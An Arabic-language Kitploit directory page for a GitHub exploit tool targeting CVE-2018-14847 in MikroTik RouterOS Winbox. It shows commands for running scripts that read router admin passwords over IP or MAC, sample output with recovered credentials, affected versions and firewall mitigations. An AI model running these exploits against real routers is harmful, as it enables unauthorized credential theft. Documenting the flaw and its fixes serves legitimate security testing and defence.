Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-14847 — MikroTik RouterOS Winbox ثغرة قراءة/كتابة ملفات تعسفية دون مصادقة | Kitploit
أدوات/GitHubGitHub/jas502n/cve-2018-14847
الاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكاتاختبار الاختراق
GitHubjas502n/cve-2018-14847

CVE-2018-14847

MikroTik RouterOS Winbox ثغرة قراءة/كتابة ملفات تعسفية دون مصادقة

عرض المستودع
3010منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WinboxExploit

هذا دليل على إمكانية استغلال الثغرة الحرجة في WinBox (CVE-2018-14847) التي تسمح بقراءة عشوائية للملفات التي تحتوي على كلمات مرور نصية.

تدوينة

https://n0p.me/winbox-bug-dissection/

المتطلبات

  • Python 3+

هذا السكريبت لن يعمل مع Python 2.x أو الإصدارات الأقدم.

طريقة الاستخدام

السكريبت بسيط ويُستخدم مع وسائط بسيطة في سطر الأوامر.

WinBox (TCP/IP)

استغلال الثغرة وقراءة كلمة المرور.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

مثال:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

خادم MAC WinBox (الطبقة الثانية)

يمكنك استخراج الملفات حتى لو لم يكن للجهاز عنوان IP.

فحص اكتشاف بسيط لأجهزة Mikrotik المتصلة محلياً.

root@kitploit:~
python3 MACServerDiscover.py

مثال:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

استغلال الثغرة وقراءة كلمة المرور.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

مثال:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

الإصدارات القابلة للاستغلال

جميع إصدارات RouterOS من 2015-05-28 إلى 2018-04-20 معرضة لهذا الاستغلال.

أجهزة Mikrotik التي تعمل بإصدارات RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

لمزيد من المعلومات انظر: https://blog.mikrotik.com/security/winbox-vulnerability.html

تقنيات التخفيف

  • قم بترقية جهاز التوجيه إلى إصدار RouterOS يتضمن الإصلاح.
  • قم بتعطيل خدمة WinBox على جهاز التوجيه.
  • يمكنك تقييد الوصول إلى خدمة WinBox لعناوين IP محددة باستخدام الأمر التالي:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • يمكنك استخدام بعض قواعد الترشيح (ACL) لمنع الوصول الخارجي إلى خدمة WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • يمكن تقييد الوصول إلى خدمة mac-winbox عن طريق تحديد الواجهات المسموح بها:
root@kitploit:~
/tool mac-server mac-winbox

حقوق النشر

  • برعاية فريق CERTCC الإيراني (https://certcc.ir). جميع الحقوق محفوظة.
تنزيل الأداة